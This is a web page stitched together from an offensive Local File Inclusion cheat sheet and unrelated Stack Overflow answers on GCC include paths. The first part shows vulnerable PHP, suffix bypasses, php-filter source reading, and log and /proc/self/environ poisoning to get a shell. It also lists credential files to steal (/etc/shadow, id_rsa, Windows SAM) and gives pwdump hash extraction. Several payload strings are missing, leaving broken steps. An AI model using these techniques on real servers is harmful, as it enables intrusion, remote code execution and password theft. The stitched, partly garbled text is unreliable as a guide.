Linux local file include

Local File Inclusion (LFI)

Local file inclusion means unauthorized access to files on the system. This vulnerability lets the attacker gain access to sensitive files on the server, and it might also lead to gaining a shell.

How does it work?

The vulnerability stems from unsanitized user-input. LFI is particularly common in php-sites.

Here is an example of php-code vulnerable to LFI. As you can see we just pass in the url-parameter into the require-function without any sanitization. So the user can just add the path to any file.

$file = $_GET['page']; require($file); 

In this example the user could just enter this string and retrieve the /etc/passwd file. 

Bypassing the added .php and other extra file-endings

It is common to add the file-extension through the php-code. Here is how this would look like:

$file = $_GET['page']; require($file . ".php"); 

The php is added to the filename, this will mean that we will not be able to find the files we are looking for. Since the file /etc/passwd.php does not exist. However, if we add the nullbyte to the end of our attack-string the .php will not be taken into account. So we add %00 to the end of our attack-string. 

This technique is usually called the nullbyte technique since %00 is the nullbyte. The technique only works in versions below php 5.3. So look out for that.

Another way to deal with this problem is just to add a question mark to your attack-string. This way the stuff after gets interpreted as a parameter and therefore excluded. Here is an example: 

Bypassing php-execution

So if you have an LFI you can easily read .txt -files but not .php files. That is because they get executed by the webserver, since their file-ending says that it contains code. This can be bypassed by using a build-in php-filter. 

Here you use a php-filter to convert it all into base64. So in return you get the whole page base64 encoded. Now you only need to decode it. Save the base64-text into a file and then run:

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Download config-files in a nice style-format

If you read files straight in the browser the styling can becomes unbearable. Really difficult to read. A way around it is to download the files from the terminal. But that won’t work if there is a login that is blocking it. So this is a great workaround:

# First we save the cookie curl -s -c cookiefile -d "user=admin&pass=admin" curl -s -b cookiefile 

Sensitive file

/etc/issue (A message or system identification to be printed before the login prompt.) /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) /etc/passwd /etc/group /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) /etc/shadow /home/[USERNAME]/.bash_history or .profile ~/.bash_history or .profile $USER/.bash_history or .profile /root/.bash_history or .profile 
/etc/mtab /etc/inetd.conf /var/log/dmessage 

Web server files

# Usually found in the root of the website .htaccess config.php 
authorized_keys id_rsa id_rsa.keystore known_hosts 
/etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_ log /usr/local/apache/logs/access. log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log 

User specific files

Found in the home-directory

.bash_history .mysql_history .my.cnf 

«Under Linux, /proc includes a directory for each running process, including kernel processes, in directories named /proc/PID, where PID is the process number. Each directory contains information about one process, including: /proc/PID/cmdline, the command that originally started the process.»

/proc/sched_debug # Can be used to see what processes the machine is running /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ 

Bruteforcing SSH known_hosts

LFI to shell

Under the right circumstances you might be able to get a shell from a LFI

Log poisoning

There are some requirements. We need to be able to read log files. In this example we are going to poison the apache log file. You can use either the success.log or the error.log

So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.

Insert php-code into the log file

This can be done with nc or telnet.

nc 80 GET / HTTP/1.1 Host: Connection: close 

You can also add it to the error-log by making a request to a page that doesn’t exists

nc 80 GET /AAAAAA HTTP/1.1 Host: Connection: close 

Or in the referer parameter.

GET / HTTP/1.1 Referer: Host: Connection: close 

Execute it in the browser

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Now you can request the log-file through the LFI and see the php-code get executed. 

Proc files

If you can read the proc-files on the system you might be able to poison them through the user-agent.

We can also inject code into /proc/self/environ through the user-agent



c:\WINDOWS\system32\eula.txt c:\boot.ini c:\WINDOWS\win.ini c:\WINNT\win.ini c:\WINDOWS\Repair\SAM c:\WINDOWS\php.ini c:\WINNT\php.ini c:\Program Files\Apache Group\Apache\conf\httpd.conf c:\Program Files\Apache Group\Apache2\conf\httpd.conf c:\Program Files\xampp\apache\conf\httpd.conf c:\php\php.ini c:\php5\php.ini c:\php4\php.ini c:\apache\php\php.ini c:\xampp\apache\bin\php.ini c:\home2\bin\stable\apache\php.ini c:\home\bin\stable\apache\php.ini 

Common path for apache log files on windows:

c:\Program Files\Apache Group\Apache\logs\access.log c:\Program Files\Apache Group\Apache\logs\error.log 

PHP Session Locations

c:\WINDOWS\TEMP\ c:\php\sessions\ c:\php5\sessions\ c:\php4\sessions\ 

Retrieving password hashes

In order to retrieve the systems password hashed we need two files: system and SAM. Once you have those two files you can extract the hased using the kali tool pwdump, like this:

pwdump systemfile samfile 

The system and SAM files can be found in different locations, so try them all. From a webserver the path might be case-sensitive, even though it is windows. So consider that!

Systemroot is usually windows windows\repair\SAM %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system 


Where are include files stored — Ubuntu Linux, GCC

the compiler, GCC in my case, knows where that stdio.h (and even the object file) are located on my hard drive. It just utilizes the files with no interaction from me. I think that on my Ubuntu Linux machine the files are stored at /usr/include/ . How does the compiler know where to look for these files? Is this configurable or is this just the expected default? Where would I look for this configuration? Since I’m asking a question on these include files, what are the source of the files? I know this might be fuzzy in the Linux community but who manages these? Who would provide and manage the same files for a Windows compiler. I was always under the impression that they come with the compiler but that was an assumption.

4 Answers 4

When the include file is in brackets the preprocessor first searches in paths specified via the -I flag. Then it searches the standard include paths (see the above link, and use the -v flag to test on your system).

When the include file is in quotes the preprocessor first searches in the current directory, then paths specified by -iquote, then -I paths, then the standard paths.

-nostdinc can be used to prevent the preprocessor from searching the standard paths at all.

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Environment variables can also be used to add search paths.

When compiling if you use the -v flag you can see the search paths used.

gcc is a rich and complex «orchestrating» program that calls many other programs to perform its duties. For the specific purpose of seeing where #include «goo» and #include will search on your system, I recommend:

$ touch a.c $ gcc -v -E a.c . #include ". " search starts here: #include search starts here: /usr/local/include /usr/lib/gcc/i686-apple-darwin9/4.0.1/include /usr/include /System/Library/Frameworks (framework directory) /Library/Frameworks (framework directory) End of search list. # 1 "a.c" 

This is one way to see the search lists for included files, including (if any) directories into which #include «. » will look but #include <. >won’t. This specific list I’m showing is actually on Mac OS X (aka Darwin) but the commands I recommend will show you the search lists (as well as interesting configuration details that I’ve replaced with . here;-) on any system on which gcc runs properly.


what is default path for header file included in c program?

Try running gcc -v -E — . When I do, part of the output is as follows:

#include search starts here: /usr/lib/gcc/i686-linux-gnu/4.6.1/include /usr/local/include /usr/lib/gcc/i686-linux-gnu/4.6.1/include-fixed /usr/include/i386-linux-gnu /usr/include 

It’s not an answer to the gstreamer question, but I hope this still helps!

/usr/local/include /usr/include 

If you use another path, you can add in your compile command with -I flag. In your case, assuming you have a /usr/local/gst/include directory, you may add -I/usr/local/gst/include and use #include

The path searched depends on the implementation (and current configuration). The correct way to find the include path is to use pkg-config

pkg-config --cflags gstreamer 

it shows this error —> Package gstreamer was not found in the pkg-config search path. Perhaps you should add the directory containing `gstreamer.pc’ to the PKG_CONFIG_PATH environment variable No package ‘gstreamer’ found

@Mr.32 Perhaps you need to specify a version. Or maybe gstreamer isn’t correctly installed. Look in /usr/lib/pkgconfig and /usr/share/pkgconfig .

@Mr.32: As cnicutar has pointed out you need to use pkg-config. For gstreamer it is not just gstreamer, it is gstreamer-. As you have installed gstreamer in /usr/local check the output of ls /usr/local/lib/pkgconfig/gstreamer* , you should find a bunch of .pc files. Now try this: export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig then pkg-config —cflags gstreamer-0.10 assuming you found gstreamer-0.10.pc in ls command. Does that show any output?


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